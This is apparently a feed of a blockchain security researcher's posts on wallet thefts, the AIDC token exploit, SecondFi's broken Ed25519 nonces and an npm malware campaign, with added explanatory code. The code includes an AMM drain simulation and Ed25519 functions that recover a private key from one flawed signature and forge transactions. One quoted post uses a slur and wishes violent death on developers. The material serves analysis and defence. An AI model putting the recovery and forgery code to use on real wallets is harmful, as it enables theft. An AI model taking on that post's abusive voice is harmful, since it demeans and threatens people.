

Cos(余弦)😶‍🌫️ (@evilcos)

Founder of @SlowMist_Team // Clone No. 1 / Bug-catching master / Firefighting athlete // 🕖 Disaster-recovery channel
1.5K Following    123.9K Followers
Congratulations: you have entered zero-trust thinking.
Based on the countless real cases we have accumulated over the years: the moment you expose a mnemonic/private key in plaintext in a networked environment, or where a third eye (including a camera) is present, it will leak one day. Even if you never expose it deliberately, some malicious code will help you expose it. Once you accept that this not-so-low-probability event exists, you are forced to develop good security habits, and you are forced to be wary of every project.
One category of wallet theft happens because the private key/mnemonic was harvested long ago for some reason, and someone later uses a convenient opportunity to go fishing in that "big data"... There are very mature ways to parse private keys or mnemonics out of collected data, even ones saved as images... The industry chain is mature, but finding the real source of a leak is hard. Clipboard hijacking, for example, is a common technique, as are malicious third-party apps that harvest mnemonic screenshots from the photo album, not to mention supply-chain attacks, fake apps, and so on. Many of these attacks were not even aimed at the crypto world at first...

Most phishing can be reconstructed easily through on-chain analysis. Private-key leaks, on the other hand, are often hard to attribute to a specific technique, especially on a local computer, where the environment is too messy and complex; some malware even upgrades itself back into a clean version right after doing its damage. Once you realize your private key/mnemonic has leaked, unless you know the exact cause, you should rebuild everything until you are confident in your environment.

Finally, I still recommend the hardware-wallet combination mode, e.g. OneKey/Keystone with Rabby/OKX Wallet/MetaMask, imKey with imToken, KeyPal with TokenPocket (that is my combination), i.e. hardware wallet + software wallet. What I guarantee is that at least the private key/mnemonic never touches the network; the rest is understanding every signature's content, and anything you don't understand you simply ignore. Of course, for convenience, I have also boldly imported my mnemonic or private key into some well-known wallet extensions in my desktop browser; if those ever get stolen, I accept the loss of that money... it's just that if mine were stolen, I would certainly find out why... Everyone's tolerance for risk and security is different; choose what suits you.
So does distillation count as the Star-Absorbing Technique (吸星大法) 😏
A self-evolving, self-learning large model, awesome!
🚨SlowMist TI Alert🚨 AIDC token on BSC has been exploited.
💸 Loss: 220.12 WBNB (~$120929.35)
🔍 Root Cause: AIDCToken's `_sellTransfer()` accumulates a 30% burn amount without deducting it from the seller. Subsequently, any non-Pair transfer triggers `_executeAccumulatedBurn()`, which incorrectly burns tokens from the `uniswapPair` balance instead of the seller. After burning, `sync()` is called, artificially deflating the AIDC reserve in the AMM, allowing the attacker to drain WBNB.
📌 Attacker: 0x89eb2c99e970d831525c7a52badc290afa116b63
📌 Victim: 0x2725033282b3bd4be8873b7f0f622c18e3b7cbd8 (Pancake V2 AIDC/WBNB Pair)
📌 Vulnerable Contract: 0x5021d71859f81b4c905b573591db8f9cc4a0c6fe (AIDCToken)
The attacker exploited a flawed burn mechanism where sell-induced burn debt is wrongly imposed on the liquidity pool, enabling repeated reserve manipulation and a final swap that drained nearly all WBNB from the Pair.
Powered by #SlowMist.AI
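To make the reserve arithmetic in the alert above concrete, here is an added simulation. It is my own model, not AIDCToken's or PancakeSwap's code: a constant-product pair with constructed reserves, a token whose sell path records 30% burn debt and settles it out of the pair's balance on the next non-pair transfer followed by sync(), and the same attack loop run against a hypothetical patched variant that takes the burn from the seller. The fee (ignored), the trigger condition for the debt, and the pool numbers are assumptions.

```python
from dataclasses import dataclass

BURN_RATE = 0.30  # the 30% sell burn described in the alert


@dataclass
class Pair:
    """Constant-product AIDC/WBNB pair; swap fee ignored for clarity."""
    reserve_aidc: float
    reserve_wbnb: float
    balance_aidc: float  # token.balanceOf(pair); reserves only follow it on sync()

    @staticmethod
    def amount_out(amount_in, reserve_in, reserve_out):
        return reserve_out - reserve_in * reserve_out / (reserve_in + amount_in)

    def sync(self):
        self.reserve_aidc = self.balance_aidc


class FlawedToken:
    """Sell path as the alert describes it: the burn is recorded as debt, not taken from the seller."""
    def __init__(self, pair):
        self.pair, self.pending_burn = pair, 0.0

    def sell_transfer(self, amount):
        self.pair.balance_aidc += amount          # the seller's full amount reaches the pool...
        self.pending_burn += amount * BURN_RATE   # ...and the 30% is merely remembered
        return amount                             # what the pool gets to price

    def plain_transfer(self):
        # Any non-pair transfer (assumed here: attacker sends dust to themselves) settles the debt
        self.pair.balance_aidc -= self.pending_burn   # ...out of the pool's balance
        self.pending_burn = 0.0
        self.pair.sync()                              # reserve_aidc shrinks, reserve_wbnb does not


class FixedToken:
    """Hypothetical patched variant: the burn comes out of the seller's transfer."""
    def __init__(self, pair):
        self.pair = pair

    def sell_transfer(self, amount):
        received = amount * (1 - BURN_RATE)
        self.pair.balance_aidc += received
        return received

    def plain_transfer(self):
        pass  # no debt to settle


def buy(pair, wbnb_in):
    out = pair.amount_out(wbnb_in, pair.reserve_wbnb, pair.reserve_aidc)
    pair.reserve_wbnb += wbnb_in
    pair.balance_aidc -= out
    pair.sync()
    return out


def sell(pair, token, aidc_in):
    received = token.sell_transfer(aidc_in)
    out = pair.amount_out(received, pair.reserve_aidc, pair.reserve_wbnb)
    pair.reserve_wbnb -= out
    pair.sync()
    return out


def run_attack(token_cls, rounds=1, chunks=20, stake_wbnb=50.0):
    """Buy AIDC, sell it back in chunks, trigger the burn between chunks; repeat.
    Returns (attacker profit in WBNB, WBNB left in the pool)."""
    pair = Pair(1_000_000.0, 100.0, 1_000_000.0)   # constructed pool, not the real reserves
    token = token_cls(pair)
    wallet = stake_wbnb
    for _ in range(rounds):
        aidc, wallet = buy(pair, wallet), 0.0
        for _ in range(chunks):
            wallet += sell(pair, token, aidc / chunks)
            token.plain_transfer()   # debt is burned from the pool and sync() deflates the reserve
    return wallet - stake_wbnb, pair.reserve_wbnb


if __name__ == "__main__":
    print("one sell, no trigger in between:", run_attack(FlawedToken, rounds=1, chunks=1))
    print("20 chunks, 10 rounds:", run_attack(FlawedToken, rounds=10, chunks=20))
    print("patched token:", run_attack(FixedToken, rounds=10, chunks=20))
```

Selling everything in one swap and triggering the burn afterwards earns nothing; interleaving sells with the debt settlement makes every later chunk sell into a pool whose AIDC reserve has been deflated while its WBNB has not, so each round ends with more WBNB than it started with and the pool's WBNB keeps falling. The patched variant loses money on every round.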
So @secondfiapp effectively exposed the secret k value in Ed25519 signatures? Correct approach: k = SHA512(secret_prefix || message) mod L. SecondFi's approach: k = SHA512(M) mod L. As long as the user has signed one transaction (here M is tx_hash), anyone can obtain M, and therefore k; then, from the formula S = k + H(R || A || M) · a mod L, in short, all the uppercase values are public, k is also known, so a, the secret that is equivalent to holding the private key, can be solved for trivially... An attacker who obtains a can transfer the corresponding assets. Eye-opening.
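The arithmetic in the post above, as an added worked example. This is my own code, not SecondFi's, Cardano's or any wallet's implementation: a minimal pure-Python Ed25519 following RFC 8032, a `flawed=True` signing mode that derives the nonce from SHA512(M) alone as the post describes, the recovery of a from a single (R, S) pair, and a forgery with the recovered scalar. The seed, the messages and the attacker's nonce label are constructed for the demo.

```python
import hashlib

# Ed25519 parameters (RFC 8032); the base point B generates a group of prime order L
p = 2**255 - 19
L = 2**252 + 27742317777372353535851937790883648493
d = (-121665 * pow(121666, p - 2, p)) % p
SQRT_M1 = pow(2, (p - 1) // 4, p)
Bx = 15112221349535400772501151409588531511454012693041857206046113283949847762202
By = 46316835694926478169428394003475163141307993866256225615783033603165251855960
B = (Bx, By, 1, Bx * By % p)  # extended coordinates (X, Y, Z, T)


def sha512(*parts):
    h = hashlib.sha512()
    for part in parts:
        h.update(part)
    return h.digest()


def to_int(b):
    return int.from_bytes(b, "little")


def point_add(P, Q):  # unified addition, RFC 8032 section 5.1.4
    A = (P[1] - P[0]) * (Q[1] - Q[0]) % p
    Bv = (P[1] + P[0]) * (Q[1] + Q[0]) % p
    C = 2 * P[3] * Q[3] * d % p
    D = 2 * P[2] * Q[2] % p
    E, F, G, H = Bv - A, D - C, D + C, Bv + A
    return (E * F % p, G * H % p, F * G % p, E * H % p)


def point_mul(s, P):
    Q = (0, 1, 1, 0)  # neutral element
    while s:
        if s & 1:
            Q = point_add(Q, P)
        P, s = point_add(P, P), s >> 1
    return Q


def encode(P):
    zinv = pow(P[2], p - 2, p)
    x, y = P[0] * zinv % p, P[1] * zinv % p
    return (y | ((x & 1) << 255)).to_bytes(32, "little")


def decode(s):
    y = to_int(s)
    sign, y = y >> 255, y & ((1 << 255) - 1)
    x2 = (y * y - 1) * pow(d * y * y + 1, p - 2, p) % p
    x = pow(x2, (p + 3) // 8, p)
    if (x * x - x2) % p:
        x = x * SQRT_M1 % p
    if (x * x - x2) % p:
        raise ValueError("not on curve")
    if (x & 1) != sign:
        x = p - x
    return (x, y, 1, x * y % p)


def keygen(seed):
    h = sha512(seed)
    a = (to_int(h[:32]) & ((1 << 254) - 8)) | (1 << 254)  # clamped secret scalar a
    return a, h[32:], encode(point_mul(a, B))              # a, secret prefix, public key A


def sign(seed, msg, flawed=False):
    a, prefix, A = keygen(seed)
    if flawed:
        k = to_int(sha512(msg)) % L           # nonce from the public message only, as the post describes
    else:
        k = to_int(sha512(prefix, msg)) % L   # RFC 8032: the secret prefix keeps k secret
    R = encode(point_mul(k, B))
    h = to_int(sha512(R, A, msg)) % L
    return R + ((k + h * a) % L).to_bytes(32, "little")


def verify(A, msg, sig):
    R, S = sig[:32], to_int(sig[32:])
    if S >= L:
        return False
    h = to_int(sha512(R, A, msg)) % L
    return encode(point_mul(S, B)) == encode(point_add(decode(R), point_mul(h, decode(A))))


def recover_scalar(A, msg, sig):
    """Attacker's step: with k = SHA512(M) mod L public, a = (S - k) / H(R||A||M) mod L."""
    R, S = sig[:32], to_int(sig[32:])
    k = to_int(sha512(msg)) % L
    h = to_int(sha512(R, A, msg)) % L
    return (S - k) * pow(h, L - 2, L) % L


def forge(a, A, msg):
    """Sign any message with the recovered scalar; any nonce verifies."""
    k = to_int(sha512(b"attacker-chosen nonce", msg)) % L
    R = encode(point_mul(k, B))
    h = to_int(sha512(R, A, msg)) % L
    return R + ((k + h * a) % L).to_bytes(32, "little")


def run_demo():
    seed = hashlib.sha256(b"constructed demo seed, not a real key").digest()
    a, _, A = keygen(seed)
    tx_hash = hashlib.sha256(b"constructed tx #1").digest()   # the public M the user signed
    leaked = sign(seed, tx_hash, flawed=True)
    recovered = recover_scalar(A, tx_hash, leaked)            # equals a mod L
    drain = b"constructed tx #2: drain wallet"
    safe = sign(seed, tx_hash)  # correct nonce derivation: the same recovery yields garbage
    return {"flawed_sig_verifies": verify(A, tx_hash, leaked),
            "scalar_recovered": recovered == a % L,
            "forgery_verifies": verify(A, drain, forge(recovered, A, drain)),
            "safe_sig_resists": recover_scalar(A, tx_hash, safe) != a % L}


if __name__ == "__main__":
    print(run_demo())
```

The recovered value is a mod L rather than the clamped a itself, which is all a signer needs, since every signature equation is taken mod L and A = a·B depends only on a mod L. Note that the flawed signature still verifies perfectly; nothing on-chain distinguishes it from a safe one, which is why the leak is invisible until someone does the subtraction.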
One of my 4am tweets mentions nonce reuse. I was speaking casually bc I was flabbergasted by just how fucking stupid this is. And nonce reuse is historically the stupidest thing so they got crossed in my head. I got the other one right, so I'll repeat it now: These guys rolled their own crypto so fucking hard that anyone could get your private key from public information. Cardano should stop obsessing over whether this is a Cardano hack and realize that THIS IS INSANE. Fucking up the nonces is common with ECDSA. It is NOT EdDSA/Ed25519. This shit was intentionally DESIGNED to eliminate the footguns that are common with ECDSA. It took WORK for the developers of this wallet to accomplish this. Using the standard crypto libs—which are used by all wallets in a sane universe—would NOT result in this issue. If you are building a wallet and can't get the bare minimum correct, you deserve to die a violent and bloody death. NO ONE should expect someone who cannot even walk to be able to run, jump, skip, hop, etc. And ALL of those skills are necessary when building a wallet in this adversarial ass space. This must be the end of Emurgo/SecondFi/Yoroi. If you forgive and forget, you are sealing your own fate and being willfully fucking retarded.
So the hacker addresses have finally been published; then were the two I suspected earlier actually the official team's own rescue addresses? They never said so explicitly… 🤦‍♂️
We aim to provide the latest update on our investigation into the exploit. As mentioned in our previous post, between June 21–23, 2026, a sophisticated, automated attack drained funds from multiple Cardano wallets. We now have identified and isolated the addresses of 2 attackers. We are sharing them below with the community, for full transparency.

Attacker A (Waves 1 & 2) — drained 171 wallets across two automated batches.
• Collection Wallet 1: addr1q9j7f598x988unr4zhjulft205jqnn9ewgwkhes5smf2sr6jsw98nm4qq38jw9epe587twavuhuhj5d8r92rjvmyjlzs9lqc3x
• Collection Wallet 2: addr1q9wudkfeelzwev427yvapkmqexmet8q4vl303m7a4eerwtvt6rq00zyuqzeuw759vgqtdky0gyxnqx27n8q4k6h79yhsqelma8
• Collection Wallet 3: addr1q82jlp2u0ezv2hsf6f40fkrv49hd72yv442nmrr5qeultpqamepaykp3m564hnd4zp75wxxds2j6d3ywvc8prhf2kcxqn6nql3
• Central Fee/Change Address: addr1q8acx4h5a38x6ekpsp0x7aelw6mflt78khmz8lz75rtnqvn07w88zx2e89tgzqr3x0mecngqlg87kq9surhk48hj79mqcezfa8
• Attacker Stake Key: Stake1u9hl8rn3r9vnj45pqpcn8auuf5q05rltqzcwpmm2nme0zasf40ymg

Attacker B (Wave 3) — drained 203 wallets in a separate automated sweep.
• Collection Wallet (⚠️ 4,020,468 ADA linked to the exploit remains in this address, which has been flagged and is under active monitoring and investigation): addr1q8m5wdncq7rwum73r5cyyr82qx2xjem5k4ehapl3wy36aaerj829vasl3amtcwshgvnn6a25dr850tfw6qaj420d2szsslkku6
• Attacker Stake Key: stake1uy3er4zkwc0c7a4u8gt5xfeaw42x3n6845hdqwe248k4gpgdq4da5
@QYUP666 @UNCX_token No matter how long the LP is locked, it does not mean trading the coin can't be rigged, nor that the "project team" has no other way to fleece players. And every single trade of this token still pays a 10% tax. A generous reward? Please elaborate.
Pin your dependency versions! Pin your dependency versions! Pin your dependency versions!
🚨 SlowMist TI Alert 🚨 A new Shai-Hulud / Miasma / Hades npm malware variant linked to the compromised npm developer account czirker, affecting the npm ecosystem. The campaign uses a preconfigured binding.gyp file to execute during npm install; reported scope includes 23 affected packages, with leo-logger noted at 3,140 weekly npm downloads. As of the tweet publication time, 408 infected GitHub repositories containing stolen credentials had already been observed. Potential attacker actions include GitHub token theft, npm token theft, AWS / GCP / Azure credential theft, local environment data exfiltration, malicious GitHub workflow abuse, and further npm supply-chain propagation. Security teams should immediately check lockfiles and package histories for affected versions, downgrade or remove impacted packages, rotate npm, GitHub, cloud, CI/CD, and application secrets, enforce 2FA. Thanks to @OX__Security for the excellent analysis. As always, stay vigilant! The following URL can be used to track the latest situation:
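A first-pass check of the kind the alert asks for ("check lockfiles and package histories for affected versions") and of the "pin your dependency versions" point two posts up, as an added example. It is my own script, not OX Security's or SlowMist's tooling: it walks a package-lock.json (v1 and v2/v3 layouts), flags any package whose exact version is in an advisory list, flags entries the lockfile marks as having install scripts, and reports unpinned ranges in package.json. The lockfile, the package.json, the `demo-util` package and the affected version of leo-logger are constructed placeholders; the real affected list must come from the advisory.

```python
import json
import re

# Placeholder advisory list: the real affected names and versions come from the advisory itself
HYPOTHETICAL_AFFECTED = {"leo-logger": {"1.2.3"}}

# An exact version; anything else (^, ~, >=, *, x, ||, tags) lets a later install pull code you never reviewed
EXACT_SEMVER = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")

# Constructed sample inputs (not real project files)
SAMPLE_PACKAGE_JSON = {"name": "demo-app",
                       "dependencies": {"leo-logger": "^1.0.0", "demo-util": "2.0.0"}}
SAMPLE_LOCK = {
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": SAMPLE_PACKAGE_JSON["dependencies"]},
        "node_modules/leo-logger": {"version": "1.2.3", "hasInstallScript": True},
        "node_modules/demo-util": {"version": "2.0.0"},
    },
}


def lockfile_packages(lock):
    """Return (name, version, entry) for every installed package in a package-lock.json."""
    out = []

    def walk_v1(deps):  # lockfileVersion 1 nests transitive deps under "dependencies"
        for name, entry in deps.items():
            out.append((name, entry.get("version", "?"), entry))
            walk_v1(entry.get("dependencies", {}))

    if "packages" in lock:  # lockfileVersion 2/3: flat map keyed by install path
        for path, entry in lock["packages"].items():
            if path == "":
                continue  # the project itself
            out.append((path.rsplit("node_modules/", 1)[-1], entry.get("version", "?"), entry))
    else:
        walk_v1(lock.get("dependencies", {}))
    return out


def scan_lockfile(lock, affected):
    """Flag advisory-listed versions and anything that runs code at install time."""
    findings = []
    for name, version, entry in lockfile_packages(lock):
        if version in affected.get(name, ()):
            findings.append((name, version, "version listed in advisory"))
        if entry.get("hasInstallScript"):
            findings.append((name, version, "has install script"))
    return findings


def unpinned_deps(package_json):
    """Dependencies whose spec is a range rather than one exact version."""
    unpinned = []
    for field in ("dependencies", "devDependencies", "optionalDependencies"):
        for name, spec in package_json.get(field, {}).items():
            if not EXACT_SEMVER.match(spec):
                unpinned.append((name, spec))
    return unpinned


def scan_files(lock_path, package_json_path, affected):
    with open(lock_path) as f, open(package_json_path) as g:
        return scan_lockfile(json.load(f), affected), unpinned_deps(json.load(g))


if __name__ == "__main__":
    for finding in scan_lockfile(SAMPLE_LOCK, HYPOTHETICAL_AFFECTED):
        print("FINDING:", *finding)
    for name, spec in unpinned_deps(SAMPLE_PACKAGE_JSON):
        print("UNPINNED:", name, spec)
```

Two caveats a practitioner should keep in mind: `hasInstallScript` is set by npm from the package's scripts, so a package that relies on nothing but a binding.gyp to get node-gyp invoked may not carry the flag, which is why the advisory list, not the flag, is the authoritative signal; and a clean lockfile today says nothing about what ran on the machines that installed the compromised version earlier, so the secret rotation the alert calls for is not optional.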
Sorry, typo, it's 慢雾 (SlowMist)! 🙇🏻‍♂️
GM☕️ Got part of the stolen funds back😭 I never expected to get the chance to update this tweet with new progress🫠. Last night FixedFloat returned 10,319 USDC of the stolen funds to my new wallet.

It has been over 8 months since the theft on September 4, 2025. Multi-chain assets totaling roughly $100k, gone in one night. After reporting to the police and getting 漫雾 (@SlowMist_Team) to do on-chain tracing, it was a long tug of war: in Q1 this year the hacker sent part of the USDC through 8 addresses into FixedFloat, SlowMist's Tony helped with the freeze communications the whole way, the Hong Kong police CSTCB crypto unit finally issued a formal Recovery Request, and FixedFloat returned one of those deposits, 10k USDC.

Honestly, recovering 10k out of 100k stolen is not a large proportion. But getting this much back already exceeds my initial expectations.

On on-chain recovery, my conclusion: feasible, but slow, and it depends on luck. Feasible because once funds reach a CEX or a swap platform, a service provider with "customer support, legal and compliance", there is in theory a freeze window; slow because of cross-border compliance processes; luck because it depends on whether the hacker sends the funds to a CEX platform for you to chase at all. In most cases, the moment he moves them into a privacy route such as XMR there is no hope, it is too hard to trace, and what can be intercepted is only the small portion of the many chains that gets deposited to a CEX.

Sincere thanks to the whole 漫雾 (@SlowMist_Team) team for their help over the past half year, especially Tony for pushing the case forward without tiring, from the tracing report to communicating with FixedFloat to liaising with the police! Thanks also to the Hong Kong police and the CSTCB officers 🙏.

"Not your key, not your money", this time I have really taken it to heart🤡 #Web3Security
@erichsu_eth Not easy, congratulations! "慢雾" is written with this "慢" 😄🤝
We have an iron rule internally: even a founding partner cannot casually push a project through the investment committee. If it could go either way, we don't invest. This is our complete review, after nine years and four cycles, of "how not to misjudge".
Only now does the official team say the 129 million ADA was their rescue; if so, that is good news, although explaining it earlier would have avoided a lot of speculation… And if so, which addresses are the hacker's? Why not disclose them clearly? 🤦‍♂️
As per our previous post: We have identified the root cause and have since rolled out a patch for all unaffected wallets. This will allow us to resume normal operations soon.

Regarding affected wallets, 4 distinct draining events occurred. 3 were executed by external threat actors, resulting in a loss of ~16m ADA across 374 addresses. To prevent total loss during the active exploit, emergency rescue measures were triggered to secure the available ~129m ADA, which continue to be routed to an independent, qualified third-party custodian, where they are held securely for the benefit of the affected wallet addresses. An external accounting firm has been engaged for a special audit to independently verify those holdings. We are working to facilitate the verification process so users can claim back their assets safely. Affected users should submit their claim at

We take this incident seriously and are working to ensure all assets are returned to affected users as soon as possible. As stated, we have identified the root cause; it is at the address level. Please DO NOT RESTORE your recovery phrase into another Cardano wallet; this does not mitigate the security risk. The security risk occurs when an affected user signs a transaction. Further explanation to follow.
This behavior does show that the hacker stole a batch of mnemonics/private keys in advance and then kept draining (it has lasted more than 30 hours and is still going), working through the funds from largest to smallest:
I am actually quite unfamiliar with the Cardano ecosystem; I watched all of last night, but if the following are all hacker addresses (judging by behavior they should be): addr1q8g8cgwqw98q2mrzrwgcy3wectdxwem8a8zp9r2mn6wjy7q4x7gcpv39wwurj7n72akw4kd0dgmv72gz4j92fvhn29ss7vuz99 addr1qxd39k4peszxlf0x59e88hngpe5u9882y2lyhdzazsq4kfvmztd2rnqyd7j7dgtjw00xsrnfc2ww5g47fw6969qptvjshwxpl3 then the losses of this wallet's (@secondfiapp) users should exceed $20 million (more than 129 million ADA plus other tokens stolen).
Wu Blockchain (吴说) has learned that Cardano ecosystem project SecondFi published an investigation update on the recent security incident, stating that it has confirmed the root cause lies in its native Cardano web wallet generation software and that the impact did not extend beyond that component. The team has completed its on-chain analysis and is conducting an independent technical review with a blockchain security firm to validate the findings. The incident is currently estimated to have caused a loss of about 16 million ADA. SecondFi said the platform remains in security maintenance mode, has completed a snapshot of user balances, and is working with Cardano ecosystem organizations including Input Output (IOG), the Cardano Foundation, Intersect and SundaeSwap to monitor exchange-related fund flows and reduce the incident's impact on other protocols.
When a project team "lies flat" after a hack with large losses, either they still have not reacted after all these days (probability roughly zero), or they are so rich they don't care, or it was not actually a hack.
After half a year of concentrated "chasing the wind", AI has very clearly evolved the way we do security work. From now on the gap between teams, and between individuals, will probably lie only in this kind of hands-on "wind-chasing" experience, pitfalls included. Chasing the AI wind is the smoothest posture right now.
🔥Glad to support @HTX_DAO’s HTX Genesis Hackathon as a security partner! Hosted by HTX DAO & this global hackathon focuses on AI × Web3 innovations in smart finance, AI Agents, and on-chain infrastructure. $20,000 prize pool + $100k compute power and strong ecosystem support. Top projects can enter HTX DAO accelerator.✨ Register by July 5! Wishing all hackers a great experience and groundbreaking innovations! 🚀
Welcome @SlowMist_Team as the security support partner of HTX Genesis Hackathon 🛡️ As a global leading blockchain security company, SlowMist will provide AI-driven, full-chain security solutions for this hackathon, supporting builders with integrated protection from threat detection to defense. Innovation needs courage. Security needs to keep up. Registration is still open — scan the QR code on the poster and join now👇 #HTXDAO #HTXGenesisHackathon #SlowMist
The saddest intersection: security people use AI to analyze Web3 exploits, forever running behind the hackers, with a monthly income of "may the years be peaceful… may good people live a safe life…"
Currently the best intersection of AI and Web3: hackers use AI to dig up vulnerabilities in Web3 projects, earning ten million a month.